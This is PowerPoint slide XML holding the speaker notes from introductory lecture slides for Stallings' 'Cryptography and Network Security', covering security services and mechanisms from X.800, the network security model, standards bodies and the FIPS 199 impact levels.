              </a:rPr>
              <a:t>assures that messages are received as sent, with no duplication, insertion, modification, reordering, replay, or loss.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>availability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>is the property of a system / resource being accessible and usable upon demand by an authorized system entity, according to performance specifications for the system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" smtClean="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5443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C4C8413-F714-4015-8233-FF74A8C5E3E1}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48131" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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Now introduce “Security Mechanism” which are the specific means of implementing one or more security services. Note these mechanisms span a wide range of technical components, but one aspect seen in many is the use of cryptographic techniques.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3680513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7ACC724-122C-4B98-8D89-C88B63A23154}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50179" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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Some examples of mechanisms from X.800. Note that the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>specific security mechanisms” are protocol layer specific, whilst the “pervasive security mechanisms” are not. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>We will meet some of these mechanisms in much greater detail later.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>See Stallings Table 1.3 for details of these mechanisms in X.800, and Table 1.4 for the relationship between services and mechanisms.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2354409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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52227" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In considering the place of encryption, its useful to use the following two models from Stallings section 1.6.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The first, illustrated in Figure 1.4, models information being </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>transferred from one party to another </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>over an insecure communications channel, in the presence of possible opponents.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> The two parties, who are the principals in this transaction, must cooperate for the exchange to take place</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" i="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> They can use an appropriate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>security transform (encryption algorithm)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, with suitable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, possibly negotiated using the presence of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>trusted third party</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Parts One through Four of this book concentrates on the types of security mechanisms and services that fit into the model shown here.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71144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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54275" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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smtClean="0">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smtClean="0">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smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1728292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24</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p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5837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5837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7A0A5AC-4E2D-4FE6-880D-57A594C6200E}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="361154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gnaposto immagine diapositiva 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6041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6042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4A633C3-9946-462E-BB4F-6E7010E36CAB}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1789779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C27E2C0-BD37-4ECE-A780-60FCB0284027}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62467" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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Lecture slides by Lawrie Brown for “Cryptography and Network Security”, 5/e, by William Stallings, briefly reviewing the text outline from Ch 0, and then presenting the content from Chapter 1 – “Introduction”.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="it-IT" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2956932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The material in this book is organized into four broad categories:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cryptographic algorithms: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This is the study of techniques for ensuring the secrecy and/or authenticity of information. The three main areas of study in this category are: 1. symmetric encryption, 2. asymmetric encryption, and 3. cryptographic hash functions, with the related topics of message authentication codes and digital signatures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mutual trust: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This is the study of techniques and algorithms for providing mutual trust in two main areas. First, key management and distribution deals with establishing trust in the encryption keys used between two communicating entities. Second, user authentication deals with establish trust in the identity of a communicating partner.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network security: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This area covers the use of cryptographic algorithms in network protocols and network applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Computer security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: In this book, we use this term to refer to the security of computers against intruders (e.g., hackers) and malicious software (e.g., viruses). Typically, the computer to be secured is attached to a network and the bulk of the threats arise from the network.</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D91CC6A-19F4-4357-B06E-E87F385A6D20}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3714443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000" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Throughout this book, we describe the most important standards in use or being developed for various aspects of cryptography and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1000" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>network security. Various organizations have been involved in the development or promotion of these standards including:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1000" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• NIST is a U.S. federal agency that deals with measurement science, standards, and technology related to U.S. government use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1000" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>and to the promotion of U.S. private-sector innovation. Despite its national scope, NIST Federal Information Processing Standards (FIPS) and Special Publications (SP) have a worldwide impact.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1000" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• ISOC is a professional membership society with worldwide organizational and individual membership. It provides leadership in addressing issues that confront the future of the Internet and is the organization home for the groups responsible for Internet infrastructure standards, including the Internet Engineering Task Force (IETF) and the Internet Architecture Board (IAB). These organizations develop Internet standards and related specifications, all of which are published as Requests for Comments (RFCs).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1000" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• ITU is an international organization within the United Nations System in which governments and the private sector coordinate global telecom networks and services The ITU Telecommunication Standardization Sector (ITU-T) is one of the three sectors of the ITU. ITU-T's mission is the production of standards covering all fields of telecommunications. ITU-T standards are referred to as Recommendations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1000" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• ISO is a worldwide federation of national standards bodies from more than 140 countries, one from each country. ISO is a nongovernmental organization that promotes the development of standardization and related activities with a view to facilitating the international exchange of goods and services, and to developing cooperation in the spheres of intellectual, scientific, technological, and economic activity. ISO's work results in international agreements that are published as International Standards.</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E8FC48-0D69-4E17-8C5B-1E368031102A}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2471513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208A561-51E4-4D1C-A39E-4F64E9BD57F4}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68611" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6861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This quote from the start of Ch 1 reflects a fundamental principle that we must understand the strength of the algorithms we use in order to have a suitable level of security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="it-IT" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="850293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AA5EE0-A34A-401A-B6BB-DA86D89BD1DF}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70659" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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The NIST Computer Security Handbook [NIST95] defines the term </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" i="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>computer security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>as shown on this slide. This definition introduces three key objectives that are at the heart of computer security as we see on the next slide.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="190684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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>We can define three levels of impact on organizations or individuals should there be a breach of security (i.e., a loss of confidentiality, integrity, or availability). These levels are defined in FIPS PUB 199:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Low: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The loss could be expected to have a limited adverse effect on organizational operations, organizational assets, or individuals. A limited adverse effect means that, for example, the loss of confidentiality, integrity, or availability might (i) cause a degradation in mission capability to an extent and duration that the organization is able to perform its primary functions, but the effectiveness of the functions is noticeably reduced; (ii) result in minor damage to organizational assets; (iii) result in minor financial loss; or (iv) result in minor harm to individuals.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Moderate: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The loss could be expected to have a serious adverse effect on organizational operations, organizational assets, or individuals. A serious adverse effect means that, for example, the loss might (i) cause a significant degradation in mission capability to an extent and duration that the organization is able to perform its primary functions, but the effectiveness of the functions is significantly reduced; (ii) result in significant damage to organizational assets; (iii) result in significant financial loss; or (iv) result in significant harm to individuals that does not involve loss of life or serious, life-threatening injuries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>High: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" smtClean="0">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 A severe or catastrophic adverse effect means that, for example, the loss might (i)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 to individuals involving loss of life or serious life threatening injuries.</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E9DC8-ED02-464C-9358-EC594BCEC4D6}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="334285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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>We now provide some examples of applications that illustrate the requirements just enumerated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• Confidentiality - Student grade information is an asset whose confidentiality is considered to be highly important by students. Grade information should only be available to students, their parents, and employees that require the information to do their job. Student enrollment information may have a moderate confidentiality rating. While still coveredby FERPA, this information is seen by more people on a daily basis, is less likely to be targeted than grade information, and results in less damage if disclosed. Directory information, such as lists of students or faculty or departmental lists, may be assigned a low confidentiality rating or indeed no rating. This information is typically freely available to the public and published on a school's Web site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
